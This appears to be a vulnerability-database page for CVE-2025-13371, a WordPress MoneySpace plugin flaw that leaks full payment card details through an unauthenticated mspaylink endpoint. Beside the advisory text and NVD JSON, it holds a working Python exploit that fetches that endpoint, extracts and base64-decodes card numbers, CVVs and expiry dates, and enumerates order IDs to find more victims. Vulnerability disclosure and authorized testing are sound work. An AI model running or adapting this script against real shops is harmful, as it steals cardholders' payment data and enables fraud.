CVE-2025-13371

Description

The MoneySpace plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.13.9. This is due to the plugin storing full payment card details (PAN, card holder name, expiry month/year, and CVV) in WordPress post_meta using base64_encode(), and then embedding these values into the publicly accessible mspaylink page's inline JavaScript without any authentication or authorization check. This makes it possible for unauthenticated attackers who know or can guess an order_id to access the mspaylink endpoint and retrieve full credit card numbers and CVV codes directly from the HTML/JS response, constituting a severe PCI-DSS violation.

CVSS Details

CVSS Score

8.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

MoneySpace WordPress Plugin < 2.13.9 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import re
import base64

# CVE-2025-13371 PoC - MoneySpace Plugin Sensitive Information Disclosure
# Target: WordPress site with MoneySpace plugin (<= 2.13.9)
# Vulnerability: Unauthenticated access to mspaylink endpoint exposes full credit card details

def exploit_moneyspace_cve_2025_13371(target_url, order_id):
    """
    Exploit for CVE-2025-13371
    This PoC demonstrates how an unauthenticated attacker can retrieve
    full credit card details by accessing the mspaylink endpoint with a known order_id.
    
    WARNING: This code is for educational and authorized security testing only.
    """
    
    # Construct the mspaylink URL with the target order_id
    mspaylink_url = f"{target_url.rstrip('/')}/?mspaylink=1&order_id={order_id}"
    
    print(f"[*] Targeting: {mspaylink_url}")
    print(f"[*] Attempting to retrieve payment card details for order_id: {order_id}")
    
    try:
        # Send HTTP GET request without any authentication
        response = requests.get(mspaylink_url, timeout=10)
        
        if response.status_code == 200:
            # Extract inline JavaScript containing sensitive card data
            # The plugin embeds card details in JavaScript variables
            
            # Extract patterns commonly used by the plugin
            patterns = {
                'card_number': r'(?:pan|card_number|cardnum)[\'"]\s*:\s*[\'"]([0-9]+)[\'"]',
                'cvv': r'(?:cvv|cvc)[\'"]\s*:\s*[\'"]([0-9]{3,4})[\'"]',
                'expiry': r'(?:expiry|exp_date|valid_thru)[\'"]\s*:\s*[\'"]([0-9/\-]+)[\'"]',
                'card_holder': r'(?:name|holder|card_holder|holder_name)[\'"]\s*:\s*[\'"]([^\'"]+)[\'"]'
            }
            
            print("\n[+] Successfully accessed mspaylink endpoint!")
            print("\n[+] Extracted sensitive information:")
            
            for data_type, pattern in patterns.items():
                matches = re.findall(pattern, response.text, re.IGNORECASE)
                if matches:
                    for match in matches:
                        # Decode base64 encoded data if present
                        try:
                            decoded = base64.b64decode(match).decode('utf-8')
                            print(f"    {data_type}: {decoded} (base64 decoded)")
                        except:
                            print(f"    {data_type}: {match}")
            
            # Also search for base64 encoded data directly
            b64_pattern = r'"([A-Za-z0-9+/=]{20,})"'
            b64_matches = re.findall(b64_pattern, response.text)
            
            print("\n[+] Potential base64 encoded data found:")
            for b64_data in b64_matches[:5]:  # Limit to first 5
                try:
                    decoded = base64.b64decode(b64_data).decode('utf-8', errors='ignore')
                    if decoded.isprintable() and len(decoded) > 4:
                        print(f"    {b64_data[:30]}... -> {decoded}")
                except:
                    pass
                    
        else:
            print(f"[-] Failed to access endpoint. Status code: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")

def scan_for_vulnerable_order_ids(target_url, id_range=(1000, 2000)):
    """
    Scan for vulnerable order IDs using a range
    In real attack scenarios, attackers might use enumeration or guess order IDs
    """
    print(f"[*] Scanning for vulnerable order IDs in range {id_range[0]}-{id_range[1]}")
    
    vulnerable_orders = []
    
    for order_id in range(id_range[0], id_range[1] + 1):
        mspaylink_url = f"{target_url.rstrip('/')}/?mspaylink=1&order_id={order_id}"
        
        try:
            response = requests.get(mspaylink_url, timeout=5)
            if response.status_code == 200 and 'card' in response.text.lower():
                print(f"[+] Potential vulnerable order found: {order_id}")
                vulnerable_orders.append(order_id)
        except:
            pass
    
    return vulnerable_orders

# Example usage
if __name__ == "__main__":
    target = "https://example-wordpress-site.com"
    order_id = 12345  # Replace with actual order ID
    
    # Single target exploitation
    exploit_moneyspace_cve_2025_13371(target, order_id)
    
    # Or scan for vulnerable orders
    # vulnerable = scan_for_vulnerable_order_ids(target, (1000, 5000))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13371
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13371
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13371/
[4] VulDB https://vuldb.com/cve/CVE-2025-13371
[5] https://github.com/MoneySpace-net/money-space-for-Woocommerce/blob/e79d96cfc1b12cece15c6f0b309045403cc6a9d2/view/mspaylink.php#L164
[6] https://github.com/MoneySpace-net/money-space-for-Woocommerce/blob/e79d96cfc1b12cece15c6f0b309045403cc6a9d2/view/mspaylink.php#L232
[7] https://plugins.trac.wordpress.org/browser/money-space/tags/2.13.9/view/mspaylink.php#L232
[8] https://plugins.trac.wordpress.org/browser/money-space/trunk/view/mspaylink.php#L232
[9] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3426909%40money-space&new=3426909%40money-space&sfp_email=&sfph_mail=
[10] https://www.wordfence.com/threat-intel/vulnerabilities/id/77db827d-9afd-4b59-b0ad-1ad562634c52?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13371", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:47.583", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The MoneySpace plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.13.9. This is due to the plugin storing full payment card details (PAN, card holder name, expiry month/year, and CVV) in WordPress post_meta using base64_encode(), and then embedding these values into the publicly accessible mspaylink page's inline JavaScript without any authentication or authorization check. This makes it possible for unauthenticated attackers who know or can guess an order_id to access the mspaylink endpoint and retrieve full credit card numbers and CVV codes directly from the HTML/JS response, constituting a severe PCI-DSS violation."}, {"lang": "es", "value": "El plugin MoneySpace para WordPress es vulnerable a la Exposición de Información Sensible en todas las versiones hasta la 2.13.9, inclusive. Esto se debe a que el plugin almacena los detalles completos de la tarjeta de pago (PAN, nombre del titular de la tarjeta, mes/año de vencimiento y CVV) en el post_meta de WordPress utilizando base64_encode(), y luego incrusta estos valores en el JavaScript en línea de la página mspaylink, que es de acceso público, sin ninguna comprobación de autenticación o autorización. Esto hace posible que atacantes no autenticados que conozcan o puedan adivinar un order_id accedan al endpoint mspaylink y recuperen números completos de tarjetas de crédito y códigos CVV directamente de la respuesta HTML/JS, lo que constituye una grave violación de PCI-DSS."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://github.com/MoneySpace-net/money-space-for-Woocommerce/blob/e79d96cfc1b12cece15c6f0b309045403cc6a9d2/view/mspaylink.php#L164", "source": "[email protected]"}, {"url": "https://github.com/MoneySpace-net/money-space-for-Woocommerce/blob/e79d96cfc1b12cece15c6f0b309045403cc6a9d2/view/mspaylink.php#L232", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/money-space/tags/2.13.9/view/mspaylink.php#L232", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/money-space/trunk/view/mspaylink.php#L232", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3426909%40money-space&new=3426909%40money-space&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/77db827d-9afd-4b59-b0ad-1ad562634c52?source=cve", "source": "[email protected]"}]}}